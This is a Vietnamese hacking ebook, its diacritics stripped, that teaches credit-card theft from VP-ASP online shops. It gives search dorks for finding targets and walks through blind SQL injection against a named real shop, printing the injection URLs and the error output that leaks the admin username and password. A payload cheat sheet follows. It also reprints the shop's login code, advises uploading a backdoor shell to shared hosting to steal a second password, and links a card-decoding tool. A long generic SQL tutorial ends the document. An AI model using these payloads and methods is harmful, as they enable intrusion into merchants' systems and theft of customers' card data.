Ebook Hacking Credit Card Version 2

------+++-----
Ebook Hacking Credit Card Version 2 Lastest And The End.

Hack ch l hc hi v trao di k nng bo mt.
Title : Credit Card Should Stop
======
Author: hieupc
Email: hieupc@gmail.com
Yahoo: hieuitpc@yahoo.com
Website: http://thegioiebook.com

=============================
Sau khi hieupc hon thnh phin bn 1, hieupc cng ngh ngay n phin bn 2 ca
Ebook Hacking Credit Card. V phin bn Ebook mi ny s hon thin v lp i nhng
thiu st tn ti Ebook c.

Tutorial ng ch nht trong Ebook ny.

Hacking Credit Card Sql Blind V.1 (Power by Tieuquainho)
C mt bi vit nm trong Ebook Hacking Credit Card version 1, c cch hack ging
cch ny nhng c v y l bi vit y nht.

Xin gii thiu s qua SQL Blind :
y l hnh thc khai thc da vo l hng bo mt ca MSSQL, da vo l hng ny
chng ta p dng nhng on m khai thc v tm kim c thng tin t Database
ca Server . SQL Blind l kiu khai thc d tm tng k t, khi cc bn s dng a
s cc thao thc k thut hack SQL khc m khng thnh cng th c th tm ni SQL
Blind ny c th khai thng nhng b tc , tuy nhin bn mt tt lun c mt khng tt
l qu trnh truy vn SQL Blind tn rt nhiu thi gian v cng sc bi v cc bn phi
tm tng k t mt trong chui cn tm . VD: tm link admin th cc bn phi tm tng
ch trong chui Database v link admin v ghp chng li thnh 1 chui. Ni nhiu cc
bn ri thi lm lin cho chc d hiu.

Chun b :
- Trnh duyt Web Opera, Mozila Firefor v1.3 hoc loi khc Internet Explorer l ok.
Khng nn xi Internet Explorer Hack (^|^)
- 1 ly nc v 1 ci khn lau mt cha chy & lau m hi.
Mc tiu:
- Tt c cc Phin bn t 5.0 tr v trc ca VP-ASP (loi shop tng i nhiu li v
nhiu cc cht (^|^))
- Cc Tm nhng Shop VP-ASP ny th c th tham kha nhng t kha bn di dng
cho vic search trn Google, Yahoo mt site tm kim bt k no .
- T Kha :
+ shopdisplayproducts.asp?id
+ shopaddtocart.asp?catalogid=
- Ti ch a ra 2 t kha bi v n l nhng mc tiu chnh gip 1 trang tm kim c
th tm ra c VP-ASP.

Chng ta bt u hack 1 site demo nha
Mc tiu l hxxps://circleathletics.com/ (s dng VP-ASP V5.0)
- u tin chng ta tm link admin ca site ny
-
hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f
ieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20
and%20left(fieldvalue,1)='a')
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'clng'
/shop/shopproductfeatures.asp, line 139
Nh vy c ngha l t kha chng ta a ra (a) khng phi l k t u tin trong chui
link admin, chng ta cht suy ngh n link admin thng l shopadmin.asp th vi
cu lnh sau thay ch a = s
-
ieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20
and%20left(fieldvalue,1)='s')

Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the varchar value 'xadminpage' to a column of data type int.
/shop/shop$db.asp, line 409
- Chnh xc l ch S l k t u tien ca link admin ri, chng ta tip tc th nhng ch
khc v tip theo
-
hxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fi
eldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20a
nd%20left(fieldvalue,2)='sh')
- Ch ch ny nha (fieldvalue,2)='sh')
- C tip tc thay tip vo tm ra link admin. Link admin kt thc = .asp nn khng
cn tm xem chui k t c bao nhiu k t u

Tip theo chng ta tm user + pass admin
ldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(flduser
name,1)='a')
Ko c g ht tip tc nh th
name,1)='c')

Syntax error converting the varchar value 'circ54' to a column of data type int.
Hin lun User ra lun site ny b li nng nu nhng site khc cc bn ng no 1 t nh
khi tm link admin l ok hihi

name,2)='ab')
y l cch tm k t th 2 , th 3 th them vo (fldusername,3)='abc') dy d m.

Chng ta c user admin trn ri circ54 tm pass ca n
ldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldp
assword,1)='a')

ldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldp
assword,1)='2')

Syntax error converting the varchar value '2005HCP' to a column of data type int.

Vy l hack c thng ny ri hihi qu d phi khng cc bn

Hy vng cc bn hiu mnh vit vng lm mong mi ngi thng cm

Cn y l 1 s tham kha them

*************(*** Ti`m link admin ***************************************

%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldna
me,10)='xadminpage'%20and%20left(fieldvalue,1)='a') <=== Doan ki tu dau

%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldna
me,10)='xadminpage'%20and%20left(fieldvalue,1)='a'%20and%20len(fieldvalue)=15)
<=== Tim so ki tu .

**************** Ti`m user ***********************************************

%20or 1=(select fldusername from tbluser where admintype='super' and
left(fldusername,1)='a') <== Ki tu dau

%20or 1=(select fldusername from tbluser where admintype='super' and
left(fldusername,2)='ab') <== Tim chu~ thu 2 - thu 3 thi the = so 3 va mo` tiep

%20or 1=(select fldusername from tbluser where left(fldusername,1)='b' and
len(fldusername)=3) <== So ki tu cua user

o%20r 1=(select fldusername from tbluser where left(fldusername,1)='a') When not
superAdmin

*************** Ti`m pass ************************************************

%20or 1=(select fldpassword from tbluser where fldusername='blue42jh' and
left(fldpassword,1)='a') <== Ki tu dau

%20or 1=(select fldpassword from tbluser where left(fldpassword,1)='b' and
len(fldpassword)=3) <== So ki tu

Hacking Password th 2 ca shop
( Nghin cu ca nobita v hieupc )

Bi vit ca nobita:

Anh em xem trc code ca ci trang login 2 pass:


<%
[COLOR=red]const SecondPassword="[COLOR=blue]password2[/COLOR]"
const Secondpasswordmsg="Second password does not match"[/COLOR]
'**********************************************************************
' Shop administration only VP-ASP Shopping Cart
' Forces user to login
' asked for userid and password
' Goes to shopadmin1.asp
' Version 4.50
' September 7, 2002
'*********************************************************************
SetSess "ShopAdmin",""
SetSess "INIT",""
Dim myconn
Dim rs
Dim username,userpassword
msg=""
dim rc
'on error resume next
If Request("Submit")<>"" Then
shopinit
SetSess "Login","Force"
ShopOpenDatabase myconn
If GetSess("Login")="Force" then
SetSess "Login",""
end if
username=request("Username")
userpassword=request("password")
username=replace(username,"'","")
userpassword=replace(userpassword,"'","")
if ucase(Username)<>"SUPPLIER" then
sql = "select * from tbluser where fldusername='" & username & "' and
fldpassword='" & userpassword & "'"
Set rs = myconn.Execute(SQL)
if not rs.eof then
CheckSecondpassword rc
If rc=0 then
GetAdminData rs
else
closerecordset rs
shopclosedatabase myconn
msg=Secondpasswordmsg & "<br>"
end if
else
rs.close
set rs=nothing
LocateSupplier
end if
if msg="" then
msg=LangAdmin01 & "<br>"
end if
Shopclosedatabase myconn
else
msg=LangAdmin01 & "<br>"
end if
end if
AdminPageHeader
if msg <> "" Then
response.write getconfig("xfont") & msg & "</font>"
end if
%>
<form action="<%=getconfig("xadminpage")%>" method="post" name="LoginForm">
<center><font face=arial size=2
color="#0080C0"><b><%=LangAdmin02%></b></font></center><br>
<TABLE WIDTH=300 BORDER=1 CELLPADDING=3 CELLSPACING=0
align="center" bordercolordark="#333399" bordercolorlight="#666699">
<TR>
<TD BGCOLOR="#0080C0" COLSPAN=2 ALIGN=LEFT VALIGN=TOP>
<font face="Arial, Helvetica" SIZE=2
color=white><B><%=LangAdmin03%></B></FONT></TD>
</TR>
<TR>
<TD WIDTH=50 ALIGN=LEFT VALIGN=Middle><font face="Arial, Helvetica"
SIZE=2><B><%=LangAdminUserName%></B></FONT></TD>
<TD ALIGN=LEFT VALIGN=TOP>
<font face="Arial, Helvetica"><INPUT TYPE=TEXT NAME="UserName"
VALUE="<%=Request("UserName") %>"></font></TD>
</TR>
<TR>
SIZE=2><B><%=LangAdminPassword%></B></FONT></TD>
<TD ALIGN=LEFT VALIGN=TOP><font face="Arial, Helvetica"><INPUT
TYPE=PASSWORD NAME="Password"></font></td></TR>
<%
If Secondpassword<>"" then
%>
<tr>
SIZE=2><B><%=LangAdminPassword & "2"%></B></FONT></TD>
<TD ALIGN=LEFT VALIGN=TOP><font face="Arial, Helvetica"><INPUT
TYPE=PASSWORD NAME="Password2"></font></td></TR>
<%end if %>
<tr>
<td></td>
<td><font face="Arial, Helvetica"><INPUT TYPE=SUBMIT
VALUE="<%=LangAdminLogin%>" name="Submit"></font></TD>
</tr>
</TABLE>
</form>
</center>
</BODY>
</HTML>
<%
Sub GetAdminData (rs)
setsess "shopadmin" ,rs("fldusername")
if isnull(rs("Admintype")) then
SetSess "admintype","SUPER"
else
setsess "admintype",ucase(rs("admintype"))
end if
setsess "login" , rs("fldusername")
setsess "usertables",rs("tablesallowed")
setsess "adminmenus",rs("fldaccess")
rs.close
set rs=nothing
LogUser GetSess("ShopAdmin"), "in", myconn
SetSess("Supplierid"),""
CheckSecurity (userpassword)
Response.redirect "shopadmin1.asp"
end sub

Sub LocateSupplier
If getconfig("xAllowSupplierlogin")<>"Yes" then exit sub
sql = "select * from suppliers where supplieruserid='" & username & "' and
supplierpassword='" & userpassword & "'"
If err.number>0 then
msg="database Open error<br>" & GetSess("Openerror")
else
If Not rs.EOF Then
setsess "shopadmin" ,request("username")
setsess "admintype","supplier"
setsess "login" , rs("supplieruserid")
setsess("supplierid"),rs("supplierid")
rs.close
set rs=nothing
GetUserTables
' setsess "usertables",rs("tablesallowed")
LogUser GetSess("ShopAdmin"), "in", myconn
response.redirect "shopadmin1.asp"
else
rs.close
set rs=nothing
end if
end if
end sub

Sub GetUserTables
dim rs
sql = "select * from tbluser where fldusername='supplier'"
if err.number>0 then
msg="database Open error<br>" & GetSess("Openerror")
else
If Not rs.EOF Then
setsess "usertables",rs("tablesallowed")
setsess "adminmenus",rs("fldaccess")
end if
end if
rs.close
set rs=nothing
end sub
Sub Checksecurity (ipassword)
dim tpassword
tpassword=ucase(ipassword)
if tpassword="VPASP" or tpassword="ADMIN" then
setsess "security","Yes"
end if
end sub
'*******************************************************************
' if using second password facility, the validate it
'*******************************************************************
Sub CheckSecondPassword(rc)
dim password
rc=4
If secondpassword="" then
rc=0
exit sub
end if
password=request.form("password2")
if password="" then exit sub
if ucase(password)<>ucase(secondpassword) then exit sub
rc=0
end sub
%>

Ch ch ch v xanh, y l ni t ci pass th 2 ca shop VPASP. Lc trc
nobita cn c suy lun rng ci pass 2 ny c thng VPASP fix v n nm trong
database ca shop, nhng ci ny khng ng. T cch t pass 2 th ny, nobita ngh
rng vic lm pass 2 ny c th do thng webmaster n edit theo hng dn ca VPASP.
Cch t pass cc v tr c th khc nhau chng hn:

CODE


<%

trong y file pass2 cha password th 2

hoc ch ng dn ca password th 2 nm u trong ci ng database ca shop m
info ca n khng thay i, to 1 table ring cha pass2 chng hn .
Ngoi nhng cch t pass2 c bn ny th cch lm cng a dng ty thuc vo trnh
ca cc webmaster

Tuy nhin trong thi gian va qua, c 1 s anh em cho rng c code khai thc pass2,
nhng thc cht l d tm trong database cc table l, nhiu kh nng cha info pass2, v
d:

CODE

affiliates

categories

configuration

coupons

customerprices

customers

dtproperties

gifts

mycompany

oitems

orders

ordertracking

prodcategories

prodfeatures

products

projects

quantitydiscounts

registrant

registryitems

reviews

searchresults

shipmethods

pass_access

suppliers

tblaccess

tbllog

tbluser

CHECK_CONSTRAINTS

COLUMN_DOMAIN_USAGE

COLUMN_PRIVILEGES

COLUMNS

CONSTRAINT_COLUMN_USAGE

CONSTRAINT_TABLE_USAGE

DOMAIN_CONSTRAINTS

DOMAINS

KEY_COLUMN_USAGE

REFERENTIAL_CONSTRAINTS

SCHEMATA

TABLE_CONSTRAINTS

TABLE_PRIVILEGES

TABLES

VIEW_COLUMN_USAGE

VIEW_TABLE_USAGE

VIEWS

V cch tm kim ny tn rt nhiu cng sc, v phi tm y cc table ca n, m vi
kiu hack hin nay th l on m table, hoc blind tng k t ca table .Ngi c ngy
cha chc ra 1 shop. Tuy nhin n nay nobita cng cha tm c gii php no tt
hn cho loi ny .

Mong rng qua bi vit ny s gip anh em tm kim pass2 c tt hn .

Bi vit ca hieupc:

Theo kinh nghim ca hieupc bit c, mun hack c password th 2 ca shop (
Secure Pass) th ch c cch hack local l nhanh v gn nht, ngoi cch hack local ny
bn c th da theo bi vit kinh nghim ca nobita m ly c pass 2. C v vic
hack local tr nn rt d khi bn c mt host trong tay, v ch cn upload 1 con backdoor
ln chng hn nh con remview.php l c th hack. Tuy nhin vic ny i hi bn phi
c kin thc vng v Hosting v DNS. Bn mun bit c shop nm server no
bn c th check DNS hoc IP nh v, v t bn ln theo m ng k cho mnh
1 host cng host vi shop bn cn ly pass 2. Cn vic hack local v check DNS th no
hay hiu r thm v host cc bn c th gh thm cc trang sau y c hng dn
c th: http://viethacker.org , http://hvaonline.net v check DNS, kim tra thng tin bn:
http://pavietnam.net , http://checkdomain.com , http://whoisc.com , http://check-dns.com
. Ngoi ra, cn nhiu trang web khc, bn c th ln google.com search.

Remview.php : http://php.spb.ru/remview/remview_2003_10_23.zip

Ngoi ra cn nhiu Mshell, Backdoor khc c th kim trn google.com hoc qua trang
http://viethacker.org

Decode CC b m ha: http://rapidshare.de/files/8343810/decodecc.rar.html (pass unrar :
thegioiebook.com )

Nhng bi cn phi c nm vng kin thc Hacking Credit Card.

- Gii thiu v SQL.

Ngun t diendantinhoc.net
~~~~~~~~~~~~~~~~~~~~~~~
SQL l chun ngn ng ANSI truy cp CSDL.

SQL l g?

SQL l vit tt ca Structured Query Language - Ngn ng truy vn cu trc.
SQL cho php bn truy cp vo CSDL.
SQL l mt chun ngn ng ca ANSI.
SQL c th thc thi cc cu truy vn trn CSDL.
SQL c th ly d liu t CSDL.
SQL c th chn d liu mi vo CSDL.
SQL c th xo d liu trong CSDL.
SQL c th sa i d liu hin c trong CSDL.
SQL d hc :-)
SQL l mt chun

SQL l mt chun ca ANSI (American National Standards Institute - Vin tiu chun
quc gia Hoa k) v truy xut cc h thng CSDL. Cc cu lnh SQL c s dng
truy xut v cp nht d liu trong mt CSDL.

SQL hot ng vi hu ht cc chng trnh CSDL nh MS Access, DB2, Informix, MS
SQL Server, Oracle, Sybase v.v...

Lu : Hu ht cc chng trnh CSDL h tr SQL u c phn m rng cho SQL ch
hot ng vi chnh chng trnh .

Bng CSDL

Mt CSDL thng bao gm mt hoc nhiu bng (table). Mi bng c xc nh thng
qua mt tn (v d Customers hoc Orders). Bng cha cc mu tin - dng (record - row),
l d liu ca bng.

Di y l mt v d v mt bng c tn l Persons (ngi):

LastName FirstName Address City
Hansen Ola Timoteivn 10 Sandnes
Svendson Tove Borgvn 23 Sandnes
Pettersen Kari Storgt 20 Stavanger

Bng trn bao gm 3 mu tin (dng), mi mu tin tng ng vi mt ngi, v bn ct
(LastName, FirstName, Address v City).

Cu truy vn SQL

Vi SQL ta c th truy vn CSDL v nhn ly kt qu tr v thng qua cc cu truy vn.

Mt cu truy vn nh sau:

SELECT LastName FROM Persons

S tr v kt qu nh sau:

LastName
Hansen
Svendson
Pettersen

Lu : Mt s h thng CSDL i hi cu lnh SQL phi kt thc bng mt du chm
phy (;). Chng ta s khng dng du chm phy trong bi vit ny.

SQL l ngn ng thao tc d liu (DML - Data Manipulation Language)

SQL l c php thc thi cc cu truy vn. SQL cng bao gm c php cp nht -
sa i, chn thm v xo cc mu tin.

Sau y l danh sch cc lnh v truy vn dng DML ca SQL:

SELECT - ly d liu t mt bng CSDL.
UPDATE - cp nht/sa i d liu trong bng.
DELETE - xo d liu trong bng.
INSERT INTO - thm d liu mi vo bng.
SQL l ngn ng nh ngha d liu (DDL - Data Definition Language)

Phn DDL ca SQL cho php to ra hoc xo cc bng. Chng ta cng c th nh ngha
cc kho (key), ch mc (index), ch nh cc lin kt gia cc bng v thit lp cc quan
h rng buc gia cc bng trong CSDL.

Cc lnh DDL quan trng nht ca SQL l:

CREATE TABLE - to ra mt bng mi.
ALTER TABLE - thay i cu trc ca bng.
DROP TABLE - xo mt bng.
CREATE INDEX - to ch mc (kho tm kim - search key).
DROP INDEX - xo ch mc c to.

-Cu lnh SELECT

Cu lnh SELECT c dng truy xut d liu t mt bng. Kt qu tr v di dng
bng c lu trong 1 bng, gi l bng kt qu - result table (cn c gi l tp kt qu
- result set).

C php

C php ca cu lnh SELECT nh sau:

SELECT tn_cc_ct
FROM tn_bng

Truy xut nhiu ct

truy xut cc ct mang tn LastName v FirstName, ta dng mt cu lnh SELECT
nh sau:

SELECT LastName, FirstName FROM Persons

Bng Persons:


Kt qu tr v:

LastName FirstName
Hansen Ola
Svendson Tove
Pettersen Kari

Truy xut tt c cc ct

truy xut tt c cc ct t bng Persons, ta dng k hiu * thay cho danh sch cc ct:

SELECT * FROM Persons

Kt qu tr v:

LastName - FirstName- Address -City
Hansen - Ola -Timoteivn 10 - Sandnes
Svendson - Tove -Borgvn 23 - Sandnes
Pettersen -Kari -Storgt 20 -Stavanger

Tp kt qu

Kt qu tr v t mt cu truy vn SQL c lu trong 1 tp kt qu (result set). Hu ht
cc h thng chng trnh CSDL cho php duyt qua tp kt qu bng cc hm lp trnh
nh Move-To-First-Record, Get-Record-Content, Move-To-Next-Record v.v...

Du chm phy (;) pha sau cu lnh

Du chm phy l mt cch chun phn cch cc cu lnh SQL nu nh h thng
CSDL cho php nhiu cu lnh SQL c thc thi thng qua mt li gi duy nht.

Cc cu lnh SQL trong bi vit ny u l cc cu lnh n (mi cu lnh l mt v ch
mt lnh SQL). MS Access v MS SQL Server khng i hi phi c du chm phy
ngay sau mi cu lnh SQL, nhng mt s chng trnh CSDL khc c th bt buc bn
phi thm du chm phy sau mi cu lnh SQL (cho d l cu lnh n). Xin nhc
li, trong bi vit ny chng ta s khng dng du chm phy cui cu lnh SQL.
-Mnh WHERE

truy xut d liu trong bng theo cc iu kin no , mt mnh WHERE c th
c thm vo cu lnh SELECT.

C php

C php mnh WHERE trong cu lnh SELECT nh sau:

SELECT tn_ct FROM tn_bng
WHERE tn_ct php_ton gi_tr

Trong mnh WHERE, cc php ton c s dng l

Php ton M t
= So snh bng
<> So snh khng bng
> Ln hn
< Nh hn
>= Ln hn hoc bng
<= Nh hn hoc bng
BETWEEN Nm gia mt khong
LIKE So snh mu chui

Lu : Trong mt s phin bn ca SQL, php ton <> c th c vit di dng !=

S dng mnh WHERE

ly danh sch nhng ngi sng thnh ph Sandnes, ta s dng mnh WHERE
trong cu lnh SELECT nh sau:

WHERE City = 'Sandnes'

Bng Persons:

LastName FirstName Address City Year

-------------------------------------------

-AND v OR

Hai ton t AND v OR ni hai hoc nhiu iu kin trong mnh WHERE li vi
nhau.

Ton t AND s hin th 1 dng nu TT C cc iu kin u tho mn. Ton t OR
hin th mt dng nu BT K iu kin no c tho.

Bng d liu dng trong v d

Svendson Stephen Kaivn 18 Sandnes

V d 1

S dng AND tm nhng ngi c tn l Tove v h l Svendson:

WHERE FirstName = 'Tove'
AND LastName = 'Svendson'
Kt qu tr v:


V d 2

S dng OR tm nhng ngi c tn l Tove hoc h l Svendson:

WHERE firstname = 'Tove'
OR lastname = 'Svendson'
Kt qu tr v:


V d 3

Bn cng c th s dng kt hp AND v OR cng vi du ngoc n to nn cc cu
truy vn phc tp:

SELECT * FROM Persons WHERE
(FirstName = 'Tove' OR FirstName = 'Stephen')
AND LastName = 'Svendson'
Kt qu tr v:


Hansen Ola Timoteivn 10 Sandnes 1951
Svendson Tove Borgvn 23 Sandnes 1978
Svendson Stale Kaivn 18 Sandnes 1980
Pettersen Kari Storgt 20 Stavanger 1960

Kt qu tr v:

LastName FirstName Address City Year
Hansen Ola Timoteivn 10 Sandnes 1951
Svendson Tove Borgvn 23 Sandnes 1978
Svendson Stale Kaivn 18 Sandnes 1980

S dng du nhy

Lu rng v d trn ta s dng hai du nhy n (') bao quanh gi tr iu kin
'Sandnes'.

SQL s dng du nhy n bao quanh cc gi tr dng chui vn bn (text). Nhiu h
CSDL cn cho php s dng du nhy kp ("). Cc gi tr dng s khng dng du
nhy bao quanh.

Vi d liu dng chui vn bn:

Cu lnh ng:
SELECT * FROM Persons WHERE FirstName = 'Tove'

Cu lnh sai:
SELECT * FROM Persons WHERE FirstName = Tove

Vi d liu dng s:

Cu lnh ng:
SELECT * FROM Persons WHERE Year > 1965

Cu lnh sai:
SELECT * FROM Persons WHERE Year > '1965'

Php ton iu kin LIKE

Php ton LIKE c dng tm kim mt chui mu vn bn trn mt ct.

C php

C php ca php ton LIKE nh sau:

WHERE tn_ct LIKE mu

Mt k hiu % c th c s dng nh ngha cc k t i din. % c th c t
trc v/hoc sau mu.

S dng LIKE

Cu lnh SQL sau s tr v danh sch nhng ngi c tn bt u bng ch O:

WHERE FirstName LIKE 'O%'

Cu lnh SQL sau s tr v danh sch nhng ngi c tn kt thc bng ch a:

WHERE FirstName LIKE '%a'

Cu lnh SQL sau s tr v danh sch nhng ngi c tn kt cha chui la:

WHERE FirstName LIKE '%la%'
Ton t BETWEEN...AND

ly ra mt min d liu nm gia hai gi tr. Hai gi tr ny c th l s, chui vn bn
hoc ngy thng.

WHERE tn_ct
BETWEEN gi_tr_1 AND gi_tr_2

Bng d liu dng trong v d

Nordmann Anna Neset 18 Sandnes

V d 1

Tm tt c nhng ngi c h (sp xp theo ABC) nm gia Hansen (tnh lun Hansen)
v Pettersen (khng tnh Pettersen):

SELECT * FROM Persons WHERE LastName
BETWEEN 'Hansen' AND 'Pettersen'

Kt qu tr v:

Nordmann Anna Neset 18 Sandnes

Lu quan trng: Ton t BETWEEN...END s tr v nhng kt qu khc nhau trn cc
h CSDL khc nhau. Vi mt s h CSDL, ton t BETWEEN...END s tr v cc dng
m c gi tr thc s "nm gia" hai khong gi tr (tc l b qua khng tnh n cc gi
tr trng vi gi tr ca hai u mt). Mt s h CSDL th s tnh lun cc gi tr trng vi
hai u mt. Trong khi mt s h CSDL khc li ch tnh cc gi tr trng vi u mt
th nht m khng tnh u mt th hai (nh v d pha trn). Do vy, bn phi kim
tra li h CSDL m bn ang dng khi s dng ton t BETWEEN...AND.

V d 2

tm nhng ngi c h (sp xp theo ABC) nm ngoi khong hai gi tr v d 1, ta
dng thm ton t NOT:

SELECT * FROM Persons WHERE LastName
NOT BETWEEN 'Hansen' AND 'Pettersen'

Kt qu tr v:


-------------------------------

T kho DISTINCT

Cu lnh SELECT s tr v thng tin v cc ct trong bng. Nhng nu chng ta khng
mun ly v cc gi tr trng nhau th sau?

Vi SQL, ta ch cn thm t kho DISTINCT vo cu lnh SELECT theo c php sau:

SELECT DISTINCT tn_ct FROM tn_bng

V d: Tm tt c cc cng ty trong bng t hng

Bng t hng ca ta nh sau:

Company OrderNumber
Sega 3412
W3Schools 2312
Trio 4678
W3Schools 6798

Cu lnh SQL sau:

SELECT Company FROM Orders

S tr v kt qu:

Company
Sega
W3Schools
Trio
W3Schools

Tn cng ty W3Schools xut hin hai ln trong kt qu, i khi y l iu chng ta
khng mun.

V d: Tm tt c cc cng ty khc nhau trong bng t hng

Cu lnh SQL sau:

SELECT DISTINCT Company FROM Orders

S tr v kt qu:

Company
Sega
W3Schools
Trio

Tn cng ty W3Schools by gi ch xut hin 1 ln, i khi y l iu chng ta mong
mun

--------------------------------

T kho ORDER BY c s dng sp xp kt qu tr v.

Sp xp cc dng

Mnh ORDER BY

c dng sp xp cc dng.

V d bng Orders:

Company OrderNumber
Sega 3412
ABC Shop 5678
W3Schools 2312
W3Schools 6798

V d:

ly danh sch cc cng ty theo th t ch ci (tng dn):

SELECT Company, OrderNumber FROM Orders
ORDER BY Company

Kt qu tr v:

Company OrderNumber
ABC Shop 5678
Sega 3412
W3Schools 6798
W3Schools 2312

V d:

Ly danh sch cc cng ty theo th t ch ci (tng dn) v ho n t hng theo th t
s tng dn:

ORDER BY Company, OrderNumber

Kt qu tr v:

Company OrderNumber
ABC Shop 5678
Sega 3412
W3Schools 2312
W3Schools 6798

V d:

Ly danh sch cc cng ty theo th t gim dn:

ORDER BY Company DESC

Kt qu tr v:

Company OrderNumber
W3Schools 6798
W3Schools 2312
Sega 3412
ABC Shop 5678
Cu lnh INSERT INTO
Cu lnh INSERT INTO c dng chn dng mi vo bng.

C php:

INSERT INTO tn_bng
VALUES (gi_tr_1, gi_tr_2,....)

Bn cng c th ch r cc ct/trng no cn chn d liu:

INSERT INTO tn_bng (ct_1, ct_2,...)
VALUES (gi_tr_1, gi_tr_2,....)

Chn 1 dng mi

Ta c bng Persons nh sau:


Cu lnh SQL sau:

INSERT INTO Persons
VALUES ('Hetland', 'Camilla', 'Hagabakka 24', 'Sandnes')

s tora kt qu trong bng Persons nh sau:

Hetland Camilla Hagabakka 24 Stavanger

Chn d liu vo cc ct/trng c th

Vi bng Persons nh trn, cu lnh SQL sau:

INSERT INTO Persons (LastName, Address)
VALUES ('Rasmussen', 'Storgt 67')

S to ra kt qu:

Hetland Camilla Hagabakka 24 Stavanger
Rasmussen Storgt 67

--------------------------
Cu lnh UPDATE

Cu lnh UPDATE c s dng cp nht/sa i d liu c trong bng.

C php:

UPDATE tn_bng
SET tn_ct = gi_tr_mi
WHERE tn_ct = gi_tr

V d: bng Person ca ta nh sau:

Nilsen Fred Kirkegt 56 Stavanger
Rasmussen Storgt 67

Cp nht 1 ct trn 1 dng

Gi s ta mun b xung thm phn tn cho ngi c h l Rasmussen:

UPDATE Person SET FirstName = 'Nina'
WHERE LastName = 'Rasmussen'

Ta s c kt qu nh sau:

Rasmussen Nina Storgt 67

Cp nht nhiu ct trn 1 dng

By gi ta li mun i tn v a ch:

UPDATE Person
SET Address = 'Stien 12', City = 'Stavanger'
WHERE LastName = 'Rasmussen'

Kt qu s l:

Rasmussen Nina Stien 12 Stavanger

-------------------------

Cu lnh DELETE

c dng xo cc dng ra khi bng.

C php:

DELETE FROM tn_bng
WHERE tn_ct = gi_tr

V d: Bng Person ca ta nh sau:

Rasmussen Nina Stien 12 Stavanger

Xo 1 dng:

Ta xo ngi c tn l Nina Rasmussen:

DELETE FROM Person WHERE LastName = 'Rasmussen'

Kt qu sau khi xo:


Xo tt c cc dng:

i khi ta mun xo tt c d liu trong bng nhng vn gi li bng cng vi cu trc
v tt c cc thuc tnh ca bng, ta c th dng cu lnh:

DELETE FROM table_name

hoc

DELETE * FROM table_name
SQL c sn lnh m cc dng trong CSDL.

C php ca hm COUNT:

SELECT COUNT(tn_ct) FROM tn_bng

Hm COUNT(*):

Hm COUNT(*) tr v s lng cc dng c chn trong bng.

V d ta c bng Persons nh sau:

Name Age
Hansen, Ola 34
Svendson, Tove 45
Pettersen, Kari 19

Cu lnh sau s tr v s lng cc dng trong bng:

SELECT COUNT(*) FROM Persons

v kt qu tr v s l:

3

Cu lnh sau s tr v s lng nhng ngi ln hn 20 tui:

SELECT COUNT(*) FROM Persons WHERE Age > 20

kt qu tr v s l:

2

Hm COUNT(column):

Hm COUNT(column) s tr v s lng cc dng c gi tr khc NULL ct c ch
nh.

V d ta c bng Persons nh sau:

Name Age
Hansen, Ola 34
Svendson, Tove 45
Pettersen, Kari

Cu lnh sau s tr v s lng nhng ngi m ct Age trong bng khng rng:

SELECT COUNT(Age) FROM Persons

v kt qu tr v s l:

2

Mnh COUNT DISTINCT

Lu : Cc v d di y ch hot ng vi CSDL Oracle v MS SQL Server, khng
hot ng trn MS Access (cha th nhim vi cc h CSDL khc!)

T kho DISTINCT v COUNT c th c dng chung vi nhau m s lng cc
kt qu khng trng nhau.

C php nh sau:

SELECT COUNT(DISTINCT column(s)) FROM table

V d ta c bng Orders nh sau:

Company OrderNumber
Sega 3412
W3Schools 2312
Trio 4678
W3Schools 6798

Cu lnh SQL sau:

SELECT COUNT(DISTINCT Company) FROM Orders

s tr v kt qu l:

3

SQL nng cao

Hm

SQL c sn kh nhiu hm thc hin m v tnh ton.

C php:

C php gi hm trong cu lnh SQL nh sau:

SELECT function(tn_ct) FROM tn_bng

Bng d liu chng ta s dng trong cc v s tip theo:

Name Age
Hansen, Ola 34
Svendson, Tove 45
Pettersen, Kari 19

Hm AVG(column)

Hm AVG tr v gi tr trung bnh tnh theo ct c ch nh ca cc dng c chn.
Cc gi tr NULL s khng c xt n khi tnh gi tr trung bnh.

V d:

Cu lnh sau s tnh s tui trung bnh ca nhng ngi c tui trn 20:

SELECT AVG(Age) FROM Persons WHERE Age > 20

kt qu tr v s l:

39.5

Hm MAX(column)

Hm MAX tr v gi tr ln nht trong ct. Cc gi tr NULL s khng c xt n.

V d:

SELECT MAX(Age) FROM Persons

kt qu tr v:

45

Hm MIN(column)

Hm MAX tr v gi tr nh nht trong ct. Cc gi tr NULL s khng c xt n.

V d:

SELECT MIN(Age) FROM Persons

kt qu tr v:

19

Lu : Hm MIN v MAX cng c th p dng cho cc ct c d liu l chui vn bn.
D liu trong ct s c so snh theo th t tng dn ca t in

Hm SUM(column)

Hm SUM tr v tng gi tr ca ct. Cc gi tr NULL s khng c xt n.

V d:

Tm tng s tui ca tt c nhng ngi c trong bng:

SELECT SUM(Age) FROM Persons

kt qu tr v:

98

V d:

Tm tng s tui ca tt c nhng ngi c tui ln hn 20:

SELECT SUM(Age) FROM Persons WHERE Age > 20

kt qu tr v:

79

GROUP BY v HAVING

Cc hm tp hp (v d nh SUM) thng thng cn thm chc nng ca mnh
GROUP BY.

GROUP BY...

Mnh GROUP BY...c thm vo SQL bi v cc hm tp hp (nh SUM) tr v
mt tp hp ca cc gi tr trong ct mi khi chng c gi, v nu khng c GROUP
BY ta khng th no tnh c tng ca cc gi tr theo tng nhm ring l trong ct.

C php ca GROUP BY nh sau:

SELECT tn_ct, SUM(tn_ct) FROM tn_bng GROUP BY tn_ct

V d s dng GROUP BY:

Gi s ta c bng Sales nh sau:

Company Amount
W3Schools 5500
IBM 4500
W3Schools 7100

Cu lnh SQL sau:

SELECT Company, SUM(Amount) FROM Sales

s tr v kt qu:

Company SUM(Amount)
W3Schools 17100
IBM 17100
W3Schools 17100

